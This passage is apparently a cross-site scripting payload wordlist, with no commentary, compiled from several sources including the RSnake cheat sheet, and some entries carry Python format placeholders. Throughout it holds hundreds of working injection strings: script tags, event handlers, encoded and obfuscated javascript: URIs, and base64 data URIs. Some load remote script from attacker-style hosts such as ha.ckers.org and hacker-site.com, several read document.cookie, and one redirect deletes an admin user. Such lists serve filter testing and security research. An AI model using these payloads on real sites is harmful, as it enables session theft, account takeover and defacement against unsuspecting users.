url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="jav&#65ascript:javascript:alert(1)">test1</a> <a href="jav&#97ascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&lt;img&sol;src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14;  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptæalert(¢XSS¢)º/scriptæ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe  src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt >alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert(1)">X </script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'> <img/ &#11; src=`~` onerror=prompt(1)> <form><iframe &#11; src="javascript:alert(1)"&#11; ;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" &#11;>X</a http://www.google<script .com>alert(document.location)</script <a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( &#00;</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061l&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
'';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script> <script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'> <img src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !"); <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <script>var var = 1; alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <" <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');"> '"></title><script>alert(1111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript"> alert('X \nS \nS');</script> </script></script><<<<script><>>>><<<script>alert(123)</script> <html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script src = 'http://www.site.com/XSS.js'></script> }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> <SCRIPT>document.write("XSS");</SCRIPT> a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /><script>alert('xss');</script> <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? '); alert('xss'); var x=' \\'); alert(\'xss\');var x=\' //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> <img src="svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> </body> </html> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(ìXSSî); </SCRIPT> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME SRC=îhttp://hacker-site.com/xss.htmlî> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <TABLE BACKGROUND="javascript:alert('XSS')"> <TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">&apos;><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> &apos;&apos;;!--"<XSS>=&{()} <SCRIPT>alert(&apos;XSS&apos;)</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert(&apos;XSS&apos;);//"> <BGSOUND SRC="javascript:alert(&apos;XSS&apos;);"> <BODY BACKGROUND="javascript:alert(&apos;XSS&apos;);"> <BODY ONLOAD=alert(&apos;XSS&apos;)> <DIV STYLE="background-image: url(javascript:alert(&apos;XSS&apos;))"> <DIV STYLE="background-image: url(&#1;javascript:alert(&apos;XSS&apos;))"> <DIV STYLE="width: expression(alert(&apos;XSS&apos;));"> <FRAMESET><FRAME SRC="javascript:alert(&apos;XSS&apos;);"></FRAMESET> <IFRAME SRC="javascript:alert(&apos;XSS&apos;);"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert(&apos;XSS&apos;);"> <IMG SRC="javascript:alert(&apos;XSS&apos;);"> <IMG SRC=javascript:alert(&apos;XSS&apos;)> <IMG DYNSRC="javascript:alert(&apos;XSS&apos;);"> <IMG LOWSRC="javascript:alert(&apos;XSS&apos;);"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE=&apos;no\xss:noxss("*//*"); <STYLE>li {list-style-image: 